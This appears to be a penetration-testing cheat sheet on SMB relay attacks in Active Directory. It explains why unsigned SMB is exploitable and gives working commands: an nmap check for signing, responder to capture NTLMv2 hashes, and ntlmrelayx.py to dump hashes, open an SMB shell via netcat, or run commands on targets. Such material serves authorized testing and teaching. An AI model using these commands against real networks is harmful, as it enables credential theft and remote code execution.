SMB Relay (Internal/External)
Note: Network Environment
This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments.
What is SMB Relay?
A man-in-the-middle may receive user NTLM authentication credentials, which, once received, can be relayed to other host(s) on the network in an attempt to authenticate as said user(s).
What's the Flaw?
Many Active Directory networks are configured in such a way that SMB message signing is not enabled -- which is the default configuration on client machines. It is always enabled on servers and domain controllers.
Detecting SMB Signing Mode
sudo nmap --script=smb2-security-mode -p445 target(s)
How is it Exploited?
Using a tool like responder
, the attacker can listen for SMB client requests. If a client connects, the attacker will receive the user's NTLMv2 authentication credential -- username and NTMLv2 hash in cleartext.
Upon receiving the NTLMv2 authentication credential, the attacker can use a tool like ntlmrelayx.py
to relay that credential to other host(s) on the network and attempt to authenticate as this user -- assuming this user is privileged to access resources on the other machines.
The Attack
Part 1: Responder
Various responder
modules can be enabled/disabled in the configuration file: /etc/responder/Responder.conf
- Disable HTTP server (hosted by ntlmrelay)
- Disable SMB server (hosted by ntlmrelay)
sudo responder -I <interface-name> -dvw
Part 2a: ntlmrelayx (dump hashes)
sudo ntlmrelayx.py -tf <targets-file> -smb2support
Part 2b: ntlmrelayx (bind shell)
Opens an SMB shell that is forwared through a socket on localhost
sudo ntlmrelayx.py -tf <targets-file> -smb2support -i
Once the shell is established, just use netcat
to connect to the socket
nc 127.0.0.1 <port>
Then, we can issue commands to the SMB shell established on the target
Part 2c: ntlmrelayx (RCE)
sudo ntlmrelayx.py -tf <targets-file> -smb2support -c 'command'